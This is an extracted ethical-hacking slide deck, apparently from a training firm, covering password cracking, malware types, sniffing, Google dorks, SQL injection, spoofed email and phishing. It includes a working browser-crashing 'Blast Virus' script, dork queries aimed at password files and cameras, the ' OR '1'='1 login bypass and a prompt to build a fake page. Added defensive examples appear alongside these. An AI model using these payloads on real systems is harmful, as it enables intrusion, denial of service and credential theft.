
INFORMATION SECURITY & ETHICAL HACKING

How secure are you?


Agenda
Networks Exposure to Security Threats
What is Information Security And Ethical Hacking
Two Major Aspects - Desktop & Internet Security
Live Demonstrations of Attacks
Networks Exposures To Threats

By the end of 2013, 95% of enterprises will be infected with undetected, financially motivated, targeted threats that evaded their traditional perimeter and host defenses - By Gartner, Top Ten Key Predictions, 2012

security predictions in 2012


Two Major Aspects Of Security

Desktop and internet security


Cracking Login Password

The Passwords are stored in SAM file

SAM = Security Account Manager

Cracking Tools :
ERD Commander
PH Crack
and many more


OR we can Change the Password

C:\> net user username password


You need the admin rights !

But you can change Passwords of Other Admin Users !

That's easy, but admin rights... hm


Virus & Worms
Trojan Horse
Keylogger

The three major threats to computer world!!


Symptoms
The system might start hanging.
Software and applications often start crashing.
System may become unpredictable.
In some extreme cases OS may also crash.

Worms
These generally don't perform any malicious activity.
They reside in the system and make copies of themselves.
These eat up the system resources.

Today almost 87% of all viruses/worms are spread through the Internet.
Let's Code a Virus!!
Is it difficult?
Trojan Horse

A Trojan is an infection that steals information.

It then sends the information to a specified location over the internet.

It makes the computer prone to hackers by making Backdoors.

Attacker Victim

Trojan is a fatal gift !


KEYLOGGER

They log all the keys that you type.

This runs in the background and is totally invisible.

Trojans often have the keyloggers with them and they mail the log to their masters.

Watch your key strokes!


Windows Registry
All initialization and configuration information used by Windows is stored in the registry.

Know how changes in the registry affect your system!


Network Scanners
Network scanners are used to find all the live systems present in the network, with information about IP address, port number, services running on those ports, vulnerabilities, installed applications, etc.

Some Tools:-

Angry IP Scanner
GFI LAN Guard
Look At LAN

Finding live Hosts!


Sniffers

Sniffers are used to capture data packets from the network by applying some poisoning, such as ARP poisoning.

Some Tools:-

Cain and Abel
Ettercap

hmmmmmmmmmm!
Cryptography

Art of secret writing: converting plaintext (readable format) into cipher text (non-readable format) by using some algorithm with the help of a key.

Encrypters!
Steganography

Art of secret writing that hides one file behind another file. Example: a text message can be hidden behind an image or video file.

Hiding..
How Do I Protect My Data ?
Use Antiviruses with Updated Signatures

Use Firewalls

Do not open Untrusted executables

Use Cryptography Techniques

I will mess it up!


World Wide Web
Web Developer's Nightmare

Remote System Scanning
Google Hacking
DNS Spoofing
SQL Injection
DOS Attack
Website Exploits
Google Cracking
Using Google

Google is more than just a Search Engine.
Special keywords can perform better Searches.

<Google Commands>
site, intitle, filetype, allintitle, inurl

Google crawls the web !


Database Cracking

Hmmmmmmmmmmm..
Advance Googling

Filetype:xls hry.nic.in
Password Cracking

Intitle:index .of master.passwd


Camera Cracking

Inurl:indexframe.shtml axis
Backend SQL string
"Select * from table where user= '" & TextBox1.Text & "' AND pass= '" & TextBox2.Text & "';"

' OR '1'='1

String after SQL Injection

Select * from table where user= '' OR '1'='1' AND pass= '' OR '1'='1';

Let's see how this is done!
We Know that is always True!
user= AND pass= ;

Let's see how a simple SQL injection works
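The concatenated query from the slide next to its parameterized fix, as an added example that is not part of the original slides. It uses Python's sqlite3 in place of the slide's VB code; the `users` table, its sample row and the function names are assumptions made for the illustration.

```python
import sqlite3

def make_db():
    # Constructed in-memory table with one sample account.
    # (Plain-text passwords mirror the slide; real systems store salted hashes.)
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db

def login_concatenated(db, user, password):
    # Same pattern as the slide: user input is pasted into the SQL text,
    # so a quote character in the input changes the structure of the query.
    sql = ("SELECT * FROM users WHERE user = '" + user +
           "' AND pass = '" + password + "';")
    return sql, db.execute(sql).fetchall()

def login_parameterized(db, user, password):
    # Fix: the SQL text is constant and the values are bound separately,
    # so input is only ever compared as data, never parsed as SQL.
    sql = "SELECT * FROM users WHERE user = ? AND pass = ?;"
    return db.execute(sql, (user, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"          # the input shown on the slide
    sql, rows = login_concatenated(db, payload, payload)
    print(sql)
    print("concatenated  :", rows)   # every row matches: login check bypassed
    print("parameterized :", login_parameterized(db, payload, payload))
    print("valid login   :", login_parameterized(db, "alice", "s3cret"))
```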


Uptu vice chancellor desk.
Jetking Super Admin Section..
Surfing Online
Browser Hacking
Phishing
Fake Emails
Social Networking Abuse

Dangers for Internet Users


Browser Cracking
Use script links that run in the browser.
These scripts change the behavior of the browser.
Example:
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300;
y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function
A(){for(i=0; i<DIL; i++){DIS=DI[i].style; DIS.position='absolute';
DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5;
DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)

javascript:b=[]; a=document.images; for(wt=0; wt<a.length;
wt++){a[wt].style.position='relative'; b[b.length]=a[wt]}; j=0;
setInterval('j++; for(wt=0; wt<b.length;
wt++){b[wt].style.left=Math.sin((6.28/a.length)*wt+j/10)*10}; void(0)',1);
void(0);

Let's Do It.........
Blast Virus
<html>
<body>
<script language="javascript">
while(1)
{
w1=window.open();
w1.document.write("<center><font color=red size=5>
blaaaast!!</font></center>");
}
</script>
</body>
</html>

Let's Do It.........
Fake Emails
Sending Fake mails with Fake headers
E-mails can be sent to anyone from any Id
It is also used in Spamming

Let's Send a Fake Email !

It's bush@georgebush.com ...


How to Catch Fake Emailers
Analyze the headers

Use sites like whatismyipaddress.com to trace the IP address of fake mail

Go to Regional Internet Registries like Apnic, Afrinic, etc.

Get the email of ISP of attacker & lodge the complaint.

Catch me if u can
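The "analyze the headers" step above, as an added example that is not part of the original slides. The message, domains and addresses are constructed (documentation IP ranges), and the function names are assumptions for the illustration.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample message (documentation IP ranges, example domains).
RAW = """\
Return-Path: <bounce@mailer.example.net>
Received: from mx.example.org (mx.example.org [198.51.100.7])
\tby inbox.example.org with ESMTP; Mon, 6 Feb 2012 10:00:05 +0000
Received: from webhost (unknown [203.0.113.45])
\tby mx.example.org with SMTP; Mon, 6 Feb 2012 10:00:01 +0000
From: "Support" <support@bank.example.com>
To: user@example.org
Subject: Account problem

Please confirm your password.
"""

IP_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

def domain_of(header_value):
    # Domain part of the address in a From / Return-Path style header.
    addr = parseaddr(header_value or "")[1]
    return addr.rpartition("@")[2].lower()

def analyze_headers(raw):
    msg = message_from_string(raw)
    # Each relay prepends its own Received header:
    # the first one is the newest hop, the last one the oldest.
    hops = []
    for received in msg.get_all("Received", []):
        hops.extend(IP_IN_BRACKETS.findall(received))
    from_dom = domain_of(msg["From"])
    env_dom = domain_of(msg["Return-Path"])
    return {
        "from_domain": from_dom,
        "return_path_domain": env_dom,
        # Visible sender and envelope sender disagree: worth a closer look.
        "domain_mismatch": bool(env_dom) and from_dom != env_dom,
        "hops": hops,
        # Only hops written by servers you trust are reliable; headers below
        # them can be forged by the sender, so treat this as a candidate.
        "origin_candidate": hops[-1] if hops else None,
    }

if __name__ == "__main__":
    for key, value in analyze_headers(RAW).items():
        print(f"{key}: {value}")
```

The origin candidate is the address to look up at the Regional Internet Registry when preparing the complaint to the ISP.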
Phishing Attack

E-mail: There's a problem with your Gmail account

Password?

Password sent

User thinks it's Gmail.com

(But it's Gmail.org)

Let's make a fake page


Preventing Phishing
Read the URL carefully

Keep a suspicious eye over info demanding E-mails.

Anti-phishing Tools can be effective

Use your Brain
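"Read the URL carefully" written as a check, as an added example that is not part of the original slides. It goes beyond the Gmail.com / Gmail.org case to cover other common lookalike tricks; the trusted-domain list, function name and sample links are assumptions constructed for the illustration.

```python
from urllib.parse import urlsplit

# Assumption for this example: the only domain the user expects to log in on.
TRUSTED_DOMAINS = {"gmail.com"}

def check_link(url, trusted=TRUSTED_DOMAINS):
    """Return (verdict, host) for a link found in an e-mail."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    if parts.scheme != "https":
        return "reject: not https", host
    if parts.username is not None:
        # In https://gmail.com@other.example/ the text before '@' is
        # userinfo; the site actually contacted is what follows the '@'.
        return "reject: userinfo in URL", host
    if not host.isascii():
        # Lookalike letters from other alphabets (homograph hosts).
        return "reject: non-ASCII host", host
    for domain in trusted:
        # Exact match or a true subdomain; "gmail.com.other.example" and
        # "notgmail.com" both fail this test.
        if host == domain or host.endswith("." + domain):
            return "ok", host
    return "reject: unknown domain", host

# Constructed sample links.
SAMPLES = [
    "https://mail.gmail.com/inbox",
    "https://gmail.org/login",
    "https://gmail.com.account-check.example.net/",
    "https://gmail.com@login.example.net/",
    "http://gmail.com/",
    "https://notgmail.com/",
]

if __name__ == "__main__":
    for link in SAMPLES:
        verdict, host = check_link(link)
        print(f"{verdict:26} {host:40} {link}")
```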


Thank You
For any query and assistance, kindly contact:

Appin Technology Lab

This is just a trailer; the movie is about to begin
